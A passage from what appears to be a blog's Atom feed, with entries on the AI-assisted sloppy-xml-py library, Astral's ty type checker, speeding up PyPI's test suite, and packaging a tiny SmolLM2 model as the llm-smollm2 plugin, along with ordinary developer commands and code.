&lt;p&gt;This was an experiment to see how far I could get with minimal manual effort, and to unstick myself from an annoying blocker. The result is good enough for my immediate use case and I also felt good enough to publish it to PyPI in case someone else has the same problem.&lt;/p&gt;
&lt;p&gt;Treat it as a curious side project which says more about what's possible today than what's necessarily advisable.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I'd like to present a slightly different conclusion here. The most interesting thing about this project is that &lt;strong&gt;the code is good&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;My criteria for good code these days is the following:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Solves a defined problem, well enough that I'm not tempted to solve it in a different way&lt;/li&gt;
&lt;li&gt;Uses minimal dependencies&lt;/li&gt;
&lt;li&gt;Clear and easy to understand&lt;/li&gt;
&lt;li&gt;Well tested, with tests that prove the code does what it's meant to do&lt;/li&gt;
&lt;li&gt;Comprehensive documentation&lt;/li&gt;
&lt;li&gt;Packaged and published in a way that makes it convenient for me to use&lt;/li&gt;
&lt;li&gt;Designed to be easy to maintain and make changes in the future&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;code&gt;sloppy-xml-py&lt;/code&gt; fits all of those criteria. It's useful, well defined, &lt;a href="https://github.com/mitsuhiko/sloppy-xml-py/blob/main/sloppy_xml.py"&gt;the code is readable&lt;/a&gt; with just about the right level of comments, everything is tested, the documentation explains everything I need to know, and it's been shipped to PyPI.&lt;/p&gt;
&lt;p&gt;I'd be proud to have written this myself.&lt;/p&gt;
&lt;p&gt;This example is &lt;em&gt;not&lt;/em&gt; an argument for replacing programmers with LLMs. The code is good because Armin is an expert programmer who stayed in full control throughout the process. As I wrote the other day, &lt;a href="https://simonwillison.net/2025/Jun/18/coding-agents/"&gt;a skilled individual with both deep domain understanding and deep understanding of the capabilities of the agent&lt;/a&gt;.&lt;/p&gt;

    &lt;p&gt;&lt;small&gt;Via &lt;a href="https://bsky.app/profile/mitsuhiko.at/post/3ls4ov5fk7c2l"&gt;@mitsuhiko.at&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/armin-ronacher"&gt;armin-ronacher&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/open-source"&gt;open-source&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pypi"&gt;pypi&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/python"&gt;python&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/xml"&gt;xml&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-assisted-programming"&gt;ai-assisted-programming&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude-code"&gt;claude-code&lt;/a&gt;&lt;/p&gt;



</summary><category term="armin-ronacher"/><category term="open-source"/><category term="pypi"/><category term="python"/><category term="xml"/><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="ai-assisted-programming"/><category term="claude"/><category term="claude-code"/></entry><entry><title>astral-sh/ty</title><link href="https://simonwillison.net/2025/May/7/ty/#atom-tag" rel="alternate"/><published>2025-05-07T18:37:33+00:00</published><updated>2025-05-07T18:37:33+00:00</updated><id>https://simonwillison.net/2025/May/7/ty/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/astral-sh/ty"&gt;astral-sh/ty&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Astral have been working on this "extremely fast Python type checker and language server, written in Rust" &lt;a href="https://simonwillison.net/2025/Jan/29/charlie-marsh/"&gt;quietly but in-the-open&lt;/a&gt; for a while now. Here's the first alpha public release - albeit &lt;a href="https://news.ycombinator.com/item?id=43918484#43919354"&gt;not yet announced&lt;/a&gt; - as &lt;a href="https://pypi.org/project/ty/"&gt;ty&lt;/a&gt; on PyPI (nice &lt;a href="https://news.ycombinator.com/item?id=43918484#43920112"&gt;donated&lt;/a&gt; two-letter name!)&lt;/p&gt;
&lt;p&gt;You can try it out via &lt;a href="https://docs.astral.sh/uv/guides/tools/#running-tools"&gt;uvx&lt;/a&gt; like this - run the command in a folder full of Python code and see what comes back:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;uvx ty check
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I got zero errors for my recent, simple &lt;a href="https://github.com/simonw/condense-json"&gt;condense-json&lt;/a&gt; library and a &lt;em&gt;ton&lt;/em&gt; of errors for my more mature &lt;a href="https://sqlite-utils.datasette.io/"&gt;sqlite-utils&lt;/a&gt; library - &lt;a href="https://gist.github.com/simonw/a13e1720b03e23783ae668eca7f6f12a"&gt;output here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;It really is &lt;em&gt;fast&lt;/em&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;cd /tmp
git clone https://github.com/simonw/sqlite-utils
cd sqlite-utils
time uvx ty check
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Reports it running in around a tenth of a second (0.109 total wall time) using multiple CPU cores:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;uvx ty check  0.18s user 0.07s system 228% cpu 0.109 total
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Running &lt;code&gt;time uvx mypy .&lt;/code&gt; in the same folder (both after first ensuring the underlying tools had been cached) took around 7x longer:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;uvx mypy .  0.46s user 0.09s system 74% cpu 0.740 total
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This isn't a fair comparison yet, as ty still isn't feature complete in comparison to mypy.&lt;/p&gt;

    &lt;p&gt;&lt;small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=43918484"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/pypi"&gt;pypi&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/python"&gt;python&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/rust"&gt;rust&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/mypy"&gt;mypy&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/uv"&gt;uv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/astral"&gt;astral&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ty"&gt;ty&lt;/a&gt;&lt;/p&gt;



</summary><category term="pypi"/><category term="python"/><category term="rust"/><category term="mypy"/><category term="uv"/><category term="astral"/><category term="ty"/></entry><entry><title>Making PyPI's test suite 81% faster</title><link href="https://simonwillison.net/2025/May/1/making-pypis-test-suite-81-faster/#atom-tag" rel="alternate"/><published>2025-05-01T21:32:18+00:00</published><updated>2025-05-01T21:32:18+00:00</updated><id>https://simonwillison.net/2025/May/1/making-pypis-test-suite-81-faster/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://blog.trailofbits.com/2025/05/01/making-pypis-test-suite-81-faster/"&gt;Making PyPI&amp;#x27;s test suite 81% faster&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Fantastic collection of tips from Alexis Challande on speeding up a Python CI workflow.&lt;/p&gt;
&lt;p&gt;I've used &lt;a href="https://github.com/pytest-dev/pytest-xdist"&gt;pytest-xdist&lt;/a&gt; to run tests in parallel (across multiple cores) before, but the following tips were new to me:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;COVERAGE_CORE=sysmon pytest --cov=myproject&lt;/code&gt; tells &lt;a href="https://coverage.readthedocs.io/en/7.8.0/"&gt;coverage.py&lt;/a&gt; on Python 3.12 and higher to use the new &lt;a href="https://docs.python.org/3/library/sys.monitoring.html#module-sys.monitoring"&gt;sys.monitoring&lt;/a&gt; mechanism, which knocked their test execution time down from 58s to 27s.&lt;/li&gt;
&lt;li&gt;Setting &lt;code&gt;testpaths = ["tests/"]&lt;/code&gt; in &lt;code&gt;pytest.ini&lt;/code&gt; lets &lt;code&gt;pytest&lt;/code&gt; skip scanning other folders when trying to find tests.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;python -X importtime ...&lt;/code&gt; shows a trace of exactly how long every package took to import. I could have done with this last week when I was trying to &lt;a href="https://github.com/simonw/llm/issues/949"&gt;debug slow LLM startup time&lt;/a&gt; which turned out to be caused by heavy imports.&lt;/li&gt;
&lt;/ul&gt;
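As a sketch of how you might post-process that trace: `-X importtime` writes one line per import to stderr, with self and cumulative microseconds in pipe-separated columns (layout per CPython's documented format), so pulling out the slowest imports looks roughly like this:

```python
def slowest_imports(importtime_output, n=3):
    """Parse `python -X importtime` output and return the n slowest cumulative imports."""
    rows = []
    for line in importtime_output.splitlines():
        # Data lines look like: "import time:       453 |       2200 | os"
        # The header line contains "[us]" and is skipped.
        if not line.startswith("import time:") or "[us]" in line:
            continue
        _, rest = line.split("import time:", 1)
        self_us, cumulative_us, name = (part.strip() for part in rest.split("|"))
        rows.append((int(cumulative_us), name))
    return sorted(rows, reverse=True)[:n]
```

Feed it the captured stderr of `python -X importtime -c "import myproject"` (the project name here is a placeholder) to see which imports dominate startup.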

    &lt;p&gt;&lt;small&gt;Via &lt;a href="https://lobste.rs/s/1jb4l7/making_pypi_s_test_suite_81_faster"&gt;lobste.rs&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/performance"&gt;performance&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pypi"&gt;pypi&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/python"&gt;python&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pytest"&gt;pytest&lt;/a&gt;&lt;/p&gt;



</summary><category term="performance"/><category term="pypi"/><category term="python"/><category term="pytest"/></entry><entry><title>Using pip to install a Large Language Model that's under 100MB</title><link href="https://simonwillison.net/2025/Feb/7/pip-install-llm-smollm2/#atom-tag" rel="alternate"/><published>2025-02-07T06:34:59+00:00</published><updated>2025-02-07T06:34:59+00:00</updated><id>https://simonwillison.net/2025/Feb/7/pip-install-llm-smollm2/#atom-tag</id><summary type="html">
    &lt;p&gt;I just released &lt;a href="https://github.com/simonw/llm-smollm2"&gt;llm-smollm2&lt;/a&gt;, a new plugin for &lt;a href="https://llm.datasette.io/"&gt;LLM&lt;/a&gt; that bundles a quantized copy of the &lt;a href="https://huggingface.co/HuggingFaceTB/SmolLM2-135M-Instruct"&gt;SmolLM2-135M-Instruct&lt;/a&gt; LLM inside of the Python package.&lt;/p&gt;
&lt;p&gt;This means you can now &lt;code&gt;pip install&lt;/code&gt; a full LLM!&lt;/p&gt;

&lt;p&gt;If you're already using &lt;a href="https://llm.datasette.io/"&gt;LLM&lt;/a&gt; you can install it like this:&lt;/p&gt;
&lt;div class="highlight highlight-source-shell"&gt;&lt;pre&gt;llm install llm-smollm2&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Then run prompts like this:&lt;/p&gt;
&lt;div class="highlight highlight-source-shell"&gt;&lt;pre&gt;llm -m SmolLM2 &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;Are dogs real?&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;(New favourite test prompt for tiny models, courtesy of &lt;a href="https://bsky.app/profile/timfduffy.com/post/3lhknvwijps2o"&gt;Tim Duffy&lt;/a&gt;. &lt;a href="https://gist.github.com/simonw/a71d83cd8c6caa49cec4a9f296c267df"&gt;Here's the result&lt;/a&gt;).&lt;/p&gt;
&lt;p&gt;If you don't have LLM yet first &lt;a href="https://llm.datasette.io/en/stable/setup.html"&gt;follow these installation instructions&lt;/a&gt;, or &lt;code&gt;brew install llm&lt;/code&gt; or &lt;code&gt;pipx install llm&lt;/code&gt; or &lt;code&gt;uv tool install llm&lt;/code&gt; depending on your preferred way of getting your Python tools.&lt;/p&gt;
&lt;p&gt;If you have &lt;a href="https://github.com/astral-sh/uv"&gt;uv&lt;/a&gt; setup you don't need to install anything at all! The following command will spin up an ephemeral environment, install the necessary packages and start a chat session with the model all in one go:&lt;/p&gt;
&lt;div class="highlight highlight-source-shell"&gt;&lt;pre&gt;uvx --with llm-smollm2 llm chat -m SmolLM2&lt;/pre&gt;&lt;/div&gt;

&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2025/smol.gif" alt="$ uvx --with llm-smollm2 llm chat -m SmolLM2
Chatting with SmolLM2
Type 'exit' or 'quit' to exit
Type '!multi' to enter multiple lines, then '!end' to finish
&gt; tell me a long story about a dog
The story of a dog is a tale of love, loss, and the unspoken rules of the universe. It begins with a small, timid, and timid dog named Max. Max was born into a loving family, but his life was forever changed by a cruel and cruel owner. He was left to fend for himself, and he was left to fend for himself.

Max's owner, a kind and gentle soul named Elena, was a cruel and cruel one. She had no patience, no love, and she would do anything to keep Max away from her. Max was left to fend for himself, and he was left to fend for himself.

Max's owner, Elena, was determined to make Max happy. She took Max to a beautiful and beautiful place, where Max was allowed to roam freely. Max was allowed to roam freely, and Max was allowed to roam freely. [Then repeats that sentence many times]" style="max-width: 100%;" /&gt;&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2025/Feb/7/pip-install-llm-smollm2/#finding-a-tiny-model"&gt;Finding a tiny model&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2025/Feb/7/pip-install-llm-smollm2/#building-the-plugin"&gt;Building the plugin&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2025/Feb/7/pip-install-llm-smollm2/#packaging-the-plugin"&gt;Packaging the plugin&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2025/Feb/7/pip-install-llm-smollm2/#publishing-to-pypi"&gt;Publishing to PyPI&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2025/Feb/7/pip-install-llm-smollm2/#is-the-model-any-good-"&gt;Is the model any good?&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h4 id="finding-a-tiny-model"&gt;Finding a tiny model&lt;/h4&gt;
&lt;p&gt;The fact that the model is almost exactly 100MB is no coincidence: that's the &lt;a href="https://pypi.org/help/#file-size-limit"&gt;default size limit&lt;/a&gt; for a Python package that can be uploaded to the Python Package Index (PyPI).&lt;/p&gt;
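If you're building a similar package, a quick pre-upload sanity check against that limit might look like this (a sketch: it treats the limit as 100 MiB and assumes your built wheels live in `dist/`, both of which you should verify for your own project):

```python
from pathlib import Path

# Assumed default per-file limit; PyPI can raise it on request
PYPI_DEFAULT_LIMIT = 100 * 1024 * 1024

def check_wheel_sizes(dist_dir="dist"):
    """Return {wheel filename: (size in bytes, fits under the default limit)}."""
    results = {}
    for wheel in Path(dist_dir).glob("*.whl"):
        size = wheel.stat().st_size
        results[wheel.name] = (size, size <= PYPI_DEFAULT_LIMIT)
    return results
```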
&lt;p&gt;I &lt;a href="https://bsky.app/profile/simonwillison.net/post/3lhklqd62jc2x"&gt;asked on Bluesky&lt;/a&gt; if anyone had seen a just-about-usable GGUF model that was under 100MB, and Artisan Loaf &lt;a href="https://bsky.app/profile/artisanloaf.bsky.social/post/3lhklumfhvs2r"&gt;pointed me&lt;/a&gt; to &lt;a href="https://huggingface.co/HuggingFaceTB/SmolLM2-135M-Instruct"&gt;SmolLM2-135M-Instruct&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;I ended up using &lt;a href="https://huggingface.co/QuantFactory/SmolLM2-135M-Instruct-GGUF/tree/main"&gt;this quantization&lt;/a&gt; by &lt;a href="https://huggingface.co/QuantFactory"&gt;QuantFactory&lt;/a&gt; just because it was the first sub-100MB model I tried that worked.&lt;/p&gt;
&lt;p&gt;Trick for finding quantized models: Hugging Face has a neat "model tree" feature in the side panel of their model pages, which includes links to relevant quantized models. I find most of my GGUFs using that feature.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2025/hugging-face-model-tree.jpg" alt="Model tree for HuggingFaceTB/SmolLM2-135M-Instruct. 60 Quantizations, 6 adapters, 80 finetunes, 1 merge." style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;h4 id="building-the-plugin"&gt;Building the plugin&lt;/h4&gt;
&lt;p&gt;I first tried the model out using Python and the &lt;a href="https://github.com/abetlen/llama-cpp-python"&gt;llama-cpp-python&lt;/a&gt; library like this:&lt;/p&gt;
&lt;div class="highlight highlight-source-shell"&gt;&lt;pre&gt;uv run --with llama-cpp-python python&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Then:&lt;/p&gt;
&lt;pre&gt;&lt;span class="pl-k"&gt;from&lt;/span&gt; &lt;span class="pl-s1"&gt;llama_cpp&lt;/span&gt; &lt;span class="pl-k"&gt;import&lt;/span&gt; &lt;span class="pl-v"&gt;Llama&lt;/span&gt;
&lt;span class="pl-k"&gt;from&lt;/span&gt; &lt;span class="pl-s1"&gt;pprint&lt;/span&gt; &lt;span class="pl-k"&gt;import&lt;/span&gt; &lt;span class="pl-s1"&gt;pprint&lt;/span&gt;
&lt;span class="pl-s1"&gt;llm&lt;/span&gt; &lt;span class="pl-c1"&gt;=&lt;/span&gt; &lt;span class="pl-en"&gt;Llama&lt;/span&gt;(&lt;span class="pl-s1"&gt;model_path&lt;/span&gt;&lt;span class="pl-c1"&gt;=&lt;/span&gt;&lt;span class="pl-s"&gt;"SmolLM2-135M-Instruct.Q4_1.gguf"&lt;/span&gt;)
&lt;span class="pl-s1"&gt;output&lt;/span&gt; &lt;span class="pl-c1"&gt;=&lt;/span&gt; &lt;span class="pl-s1"&gt;llm&lt;/span&gt;.&lt;span class="pl-c1"&gt;create_chat_completion&lt;/span&gt;(&lt;span class="pl-s1"&gt;messages&lt;/span&gt;&lt;span class="pl-c1"&gt;=&lt;/span&gt;[
    {&lt;span class="pl-s"&gt;"role"&lt;/span&gt;: &lt;span class="pl-s"&gt;"user"&lt;/span&gt;, &lt;span class="pl-s"&gt;"content"&lt;/span&gt;: &lt;span class="pl-s"&gt;"Hi"&lt;/span&gt;}
])
&lt;span class="pl-en"&gt;pprint&lt;/span&gt;(&lt;span class="pl-s1"&gt;output&lt;/span&gt;)&lt;/pre&gt;
&lt;p&gt;This gave me the output I was expecting:&lt;/p&gt;
&lt;pre&gt;{&lt;span class="pl-s"&gt;'choices'&lt;/span&gt;: [{&lt;span class="pl-s"&gt;'finish_reason'&lt;/span&gt;: &lt;span class="pl-s"&gt;'stop'&lt;/span&gt;,
              &lt;span class="pl-s"&gt;'index'&lt;/span&gt;: &lt;span class="pl-c1"&gt;0&lt;/span&gt;,
              &lt;span class="pl-s"&gt;'logprobs'&lt;/span&gt;: &lt;span class="pl-c1"&gt;None&lt;/span&gt;,
              &lt;span class="pl-s"&gt;'message'&lt;/span&gt;: {&lt;span class="pl-s"&gt;'content'&lt;/span&gt;: &lt;span class="pl-s"&gt;'Hello! How can I assist you today?'&lt;/span&gt;,
                          &lt;span class="pl-s"&gt;'role'&lt;/span&gt;: &lt;span class="pl-s"&gt;'assistant'&lt;/span&gt;}}],
 &lt;span class="pl-s"&gt;'created'&lt;/span&gt;: &lt;span class="pl-c1"&gt;1738903256&lt;/span&gt;,
 &lt;span class="pl-s"&gt;'id'&lt;/span&gt;: &lt;span class="pl-s"&gt;'chatcmpl-76ea1733-cc2f-46d4-9939-90efa2a05e7c'&lt;/span&gt;,
 &lt;span class="pl-s"&gt;'model'&lt;/span&gt;: &lt;span class="pl-s"&gt;'SmolLM2-135M-Instruct.Q4_1.gguf'&lt;/span&gt;,
 &lt;span class="pl-s"&gt;'object'&lt;/span&gt;: &lt;span class="pl-s"&gt;'chat.completion'&lt;/span&gt;,
 &lt;span class="pl-s"&gt;'usage'&lt;/span&gt;: {&lt;span class="pl-s"&gt;'completion_tokens'&lt;/span&gt;: &lt;span class="pl-c1"&gt;9&lt;/span&gt;, &lt;span class="pl-s"&gt;'prompt_tokens'&lt;/span&gt;: &lt;span class="pl-c1"&gt;31&lt;/span&gt;, &lt;span class="pl-s"&gt;'total_tokens'&lt;/span&gt;: &lt;span class="pl-c1"&gt;40&lt;/span&gt;}}&lt;/pre&gt;
&lt;p&gt;But it also &lt;em&gt;spammed&lt;/em&gt; my terminal with a huge volume of debugging output - which started like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;llama_model_load_from_file_impl: using device Metal (Apple M2 Max) - 49151 MiB free
llama_model_loader: loaded meta data with 33 key-value pairs and 272 tensors from SmolLM2-135M-Instruct.Q4_1.gguf (version GGUF V3 (latest))
llama_model_loader: Dumping metadata keys/values. Note: KV overrides do not apply in this output.
llama_model_loader: - kv   0:                       general.architecture str              = llama
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And then continued for more than &lt;a href="https://gist.github.com/simonw/9ef7acd836b1cc40c14686eae4dca340"&gt;500 lines&lt;/a&gt;!&lt;/p&gt;
&lt;p&gt;I've had this problem with &lt;code&gt;llama-cpp-python&lt;/code&gt; and &lt;code&gt;llama.cpp&lt;/code&gt; in the past, and was sad to find that the documentation still doesn't have a great answer for how to avoid this.&lt;/p&gt;
&lt;p&gt;So I turned to the just released &lt;a href="https://simonwillison.net/2025/Feb/5/gemini-2/"&gt;Gemini 2.0 Pro (Experimental)&lt;/a&gt;, because I know it's a strong model with a long input limit.&lt;/p&gt;
&lt;p&gt;I ran the entire &lt;code&gt;llama-cpp-python&lt;/code&gt; codebase through it like this:&lt;/p&gt;
&lt;div class="highlight highlight-source-shell"&gt;&lt;pre&gt;&lt;span class="pl-c1"&gt;cd&lt;/span&gt; /tmp
git clone https://github.com/abetlen/llama-cpp-python
&lt;span class="pl-c1"&gt;cd&lt;/span&gt; llama-cpp-python
files-to-prompt -e py &lt;span class="pl-c1"&gt;.&lt;/span&gt; -c &lt;span class="pl-k"&gt;|&lt;/span&gt; llm -m gemini-2.0-pro-exp-02-05 \
  &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;How can I prevent this library from logging any information at all while it is running - no stderr or anything like that&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Here's &lt;a href="https://gist.github.com/simonw/20476c2c6f7604df2994212cebfafef4#response"&gt;the answer I got back&lt;/a&gt;. It recommended setting the logger to &lt;code&gt;logging.CRITICAL&lt;/code&gt;, passing &lt;code&gt;verbose=False&lt;/code&gt; to the constructor and, most importantly, using the following context manager to suppress all output:&lt;/p&gt;
&lt;pre&gt;&lt;span class="pl-k"&gt;from&lt;/span&gt; &lt;span class="pl-s1"&gt;contextlib&lt;/span&gt; &lt;span class="pl-k"&gt;import&lt;/span&gt; &lt;span class="pl-s1"&gt;contextmanager&lt;/span&gt;, &lt;span class="pl-s1"&gt;redirect_stderr&lt;/span&gt;, &lt;span class="pl-s1"&gt;redirect_stdout&lt;/span&gt;

&lt;span class="pl-en"&gt;@&lt;span class="pl-s1"&gt;contextmanager&lt;/span&gt;&lt;/span&gt;
&lt;span class="pl-k"&gt;def&lt;/span&gt; &lt;span class="pl-en"&gt;suppress_output&lt;/span&gt;():
    &lt;span class="pl-s"&gt;"""&lt;/span&gt;
&lt;span class="pl-s"&gt;    Suppresses all stdout and stderr output within the context.&lt;/span&gt;
&lt;span class="pl-s"&gt;    """&lt;/span&gt;
    &lt;span class="pl-k"&gt;with&lt;/span&gt; &lt;span class="pl-en"&gt;open&lt;/span&gt;(&lt;span class="pl-s1"&gt;os&lt;/span&gt;.&lt;span class="pl-c1"&gt;devnull&lt;/span&gt;, &lt;span class="pl-s"&gt;"w"&lt;/span&gt;) &lt;span class="pl-k"&gt;as&lt;/span&gt; &lt;span class="pl-s1"&gt;devnull&lt;/span&gt;:
        &lt;span class="pl-k"&gt;with&lt;/span&gt; &lt;span class="pl-en"&gt;redirect_stdout&lt;/span&gt;(&lt;span class="pl-s1"&gt;devnull&lt;/span&gt;), &lt;span class="pl-en"&gt;redirect_stderr&lt;/span&gt;(&lt;span class="pl-s1"&gt;devnull&lt;/span&gt;):
            &lt;span class="pl-k"&gt;yield&lt;/span&gt;&lt;/pre&gt;
&lt;p&gt;This worked! It turned out most of the output came from initializing the &lt;code&gt;Llama&lt;/code&gt; class, so I wrapped that like so:&lt;/p&gt;
&lt;pre&gt;&lt;span class="pl-k"&gt;with&lt;/span&gt; &lt;span class="pl-en"&gt;suppress_output&lt;/span&gt;():
    &lt;span class="pl-s1"&gt;model&lt;/span&gt; &lt;span class="pl-c1"&gt;=&lt;/span&gt; &lt;span class="pl-en"&gt;Llama&lt;/span&gt;(&lt;span class="pl-s1"&gt;model_path&lt;/span&gt;&lt;span class="pl-c1"&gt;=&lt;/span&gt;&lt;span class="pl-s1"&gt;self&lt;/span&gt;.&lt;span class="pl-c1"&gt;model_path&lt;/span&gt;, &lt;span class="pl-s1"&gt;verbose&lt;/span&gt;&lt;span class="pl-c1"&gt;=&lt;/span&gt;&lt;span class="pl-c1"&gt;False&lt;/span&gt;)&lt;/pre&gt;
&lt;p&gt;Proof of concept in hand, I set about writing the plugin. I started with my &lt;a href="https://github.com/simonw/llm-plugin"&gt;simonw/llm-plugin&lt;/a&gt; cookiecutter template:&lt;/p&gt;
&lt;div class="highlight highlight-source-shell"&gt;&lt;pre&gt;uvx cookiecutter gh:simonw/llm-plugin&lt;/pre&gt;&lt;/div&gt;
&lt;pre&gt;&lt;code&gt;  [1/6] plugin_name (): smollm2
  [2/6] description (): SmolLM2-135M-Instruct.Q4_1 for LLM
  [3/6] hyphenated (smollm2): 
  [4/6] underscored (smollm2): 
  [5/6] github_username (): simonw
  [6/6] author_name (): Simon Willison
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;a href="https://github.com/simonw/llm-smollm2/blob/0.1.1/llm_smollm2/__init__.py"&gt;rest of the plugin&lt;/a&gt; was mostly borrowed from my existing &lt;a href="https://github.com/simonw/llm-gguf/blob/0.2/llm_gguf.py"&gt;llm-gguf&lt;/a&gt; plugin, updated based on the latest README for the &lt;code&gt;llama-cpp-python&lt;/code&gt; project.&lt;/p&gt;
&lt;p&gt;There's more information on building plugins in &lt;a href="https://llm.datasette.io/en/stable/plugins/tutorial-model-plugin.html"&gt;the tutorial on writing a plugin&lt;/a&gt;.&lt;/p&gt;
&lt;h4 id="packaging-the-plugin"&gt;Packaging the plugin&lt;/h4&gt;
&lt;p&gt;Once I had that working the last step was to figure out how to package it for PyPI. I'm never quite sure of the best way to bundle a binary file in a Python package, especially one that uses a &lt;code&gt;pyproject.toml&lt;/code&gt; file... so I dumped a copy of my existing &lt;code&gt;pyproject.toml&lt;/code&gt; file into o3-mini-high and prompted:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Modify this to bundle a SmolLM2-135M-Instruct.Q4_1.gguf file inside the package. I don't want to use hatch or a manifest or anything, I just want to use setuptools.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Here's &lt;a href="https://chatgpt.com/share/67a59122-67c8-8006-9be4-29f8419343ad"&gt;the shared transcript&lt;/a&gt; - it gave me exactly what I wanted. I bundled it by adding this to the end of the &lt;code&gt;toml&lt;/code&gt; file:&lt;/p&gt;
&lt;div class="highlight highlight-source-toml"&gt;&lt;pre&gt;[&lt;span class="pl-en"&gt;tool&lt;/span&gt;.&lt;span class="pl-en"&gt;setuptools&lt;/span&gt;.&lt;span class="pl-en"&gt;package-data&lt;/span&gt;]
&lt;span class="pl-smi"&gt;llm_smollm2&lt;/span&gt; = [&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;SmolLM2-135M-Instruct.Q4_1.gguf&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;]&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Then I dropped that &lt;code&gt;.gguf&lt;/code&gt; file into the &lt;code&gt;llm_smollm2/&lt;/code&gt; directory and put my plugin code in &lt;code&gt;llm_smollm2/__init__.py&lt;/code&gt;.&lt;/p&gt;
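&lt;p&gt;One detail to get right with bundled data files is resolving their path at runtime. I haven't checked exactly how the plugin does this, but a common stdlib approach is &lt;code&gt;importlib.resources&lt;/code&gt;; the helper below is a sketch, demonstrated against the stdlib's own &lt;code&gt;json&lt;/code&gt; package since &lt;code&gt;llm_smollm2&lt;/code&gt; may not be installed:&lt;/p&gt;

```python
from importlib.resources import files

def bundled_path(package: str, filename: str) -> str:
    # Resolve a data file shipped inside an installed package, e.g.
    # bundled_path("llm_smollm2", "SmolLM2-135M-Instruct.Q4_1.gguf")
    # (that call is illustrative and assumes the package is installed).
    return str(files(package) / filename)

# Demonstrated here against a package that is always available:
print(bundled_path("json", "__init__.py"))
```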
&lt;p&gt;I tested it locally by running this:&lt;/p&gt;
&lt;div class="highlight highlight-source-shell"&gt;&lt;pre&gt;python -m pip install build
python -m build&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;I fired up a fresh virtual environment and ran &lt;code&gt;pip install ../path/to/llm-smollm2/dist/llm_smollm2-0.1-py3-none-any.whl&lt;/code&gt; to confirm that the package worked as expected.&lt;/p&gt;
&lt;h4 id="publishing-to-pypi"&gt;Publishing to PyPI&lt;/h4&gt;
